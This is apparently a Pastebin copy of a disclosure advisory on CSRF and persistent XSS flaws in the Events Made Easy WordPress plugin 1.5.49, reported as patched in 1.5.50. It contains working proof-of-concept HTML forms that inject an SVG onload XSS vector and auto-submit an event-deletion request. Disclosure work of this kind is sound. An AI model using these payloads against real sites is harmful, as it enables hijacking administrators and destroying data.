Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Plugin link: https://wordpress.org/plugins/events-made-easy/
- Active Installs: 10,000+
- Version tested: 1.5.49
- CVE Reference: Waiting
- Original advisory:
- https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/
- Events Made Easy is a full-featured event management solution for
- WordPress. Events Made Easy supports public, private, draft and recurring
- events, locations management, RSVP (+ optional approval), Paypal,
- 2Checkout, FirstData and Google maps. With Events Made Easy you can plan
- and publish your event, or let people reserve spaces for your weekly
- meetings. You can add events list, calendars and description to your blog
- using multiple sidebar widgets or shortcodes; if you are a web designer you
- can simply employ the template tags provided by Events Made Easy.
- When playing around with this plugin I noticed a couple of vulnerabilities.
- In my opinion they are critical because they can could cause damage to a
- WordPress installation.
- All of them are related to CSRF where the vendor forgot to place a security
- token (wp_nonce) on the affected forms.
- #1 Add template CSRF + Persistent XSS
- URL: /wp-admin/admin.php?page=eme-templates
- If a authenticated admin clicks on the “Add template” button on a html with
- this code:
- <form action="https://victims_website/wp-admin/admin.php?page=eme-templates"
- method="POST">
- <input type="hidden" name="eme_admin_action" value="do_addtemplate" />
- <input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
- <input type="hidden" name="format" value="csrf" />
- <input type="submit" name="submit" value="Add template" />
- </form>
- It will add a Persistent XSS vector on the template description field. This
- field is automatically executed when the admin visits the page
- admin.php?page=eme-templates.
- Possible attack scenario:
- Malicious user checks that Events Made Easy is installed on a WordPress
- installation
- Malicious sends admin a link to the page that has a auto-submit form
- with a XSS vector that hijacks victims browser
- Victim visits the page and gets hijacked
- #2 Add Form Field CSRF + Persistent XSS
- URL: /wp-admin/admin.php?page=eme-formfields
- If a authenticated admin clicks on the “Add field” button on a html with
- this code:
- <form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"
- method="POST">
- <input type="hidden" name="eme_admin_action" value="do_addformfield" />
- <input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
- <input type="hidden" name="field_type" value="1" />
- <input type="hidden" name="field_info" value="csrf" />
- <input type="hidden" name="field_tags" value="csrf" />
- <input type="submit" name="submit" value="Add field" />
- </form>
- Like vulnerability #1 the attack scenario is the same. Same issue affects
- form fields on this plugin.
- #3 Remove events older than CSRF
- URL: /wp-admin/admin.php?page=eme-cleanup
- With this CSRF a malicious user could delete all the events older than a
- certain number.
- In my proof of concept I used a auto-submit form that could also be used in
- vulnerabilities #1 and #2.
- <form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"
- name="dsopas" method="POST">
- <input type="hidden" name="page" value="eme-cleanup" />
- <input type="hidden" name="eme_admin_action" value="eme_cleanup" />
- <input type="hidden" name="eme_number" value="1" />
- <input type="hidden" name="eme_period" value="day" />
- <input type="hidden" name="doaction" value="Apply" />
- </form> <script> document.dsopas.submit(); </script>
- Possible attack scenario:
- Malicious user checks that Events Made Easy is installed on a WordPress
- installation
- Malicious sends admin a link to the page that has this auto-submit form
- Without victim noticing, events older than 1 day will be removed.
- Solution:
- Vendor in a matter of few hours launched a patched version – 1.5.50. Also
- he was kind enough to put my name on the changelog.
- *-David Sopas*
- *davidsopas.com <https://www.davidsopas.com>*
- *@dsopas <https://www.twitter.com/dsopas>*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement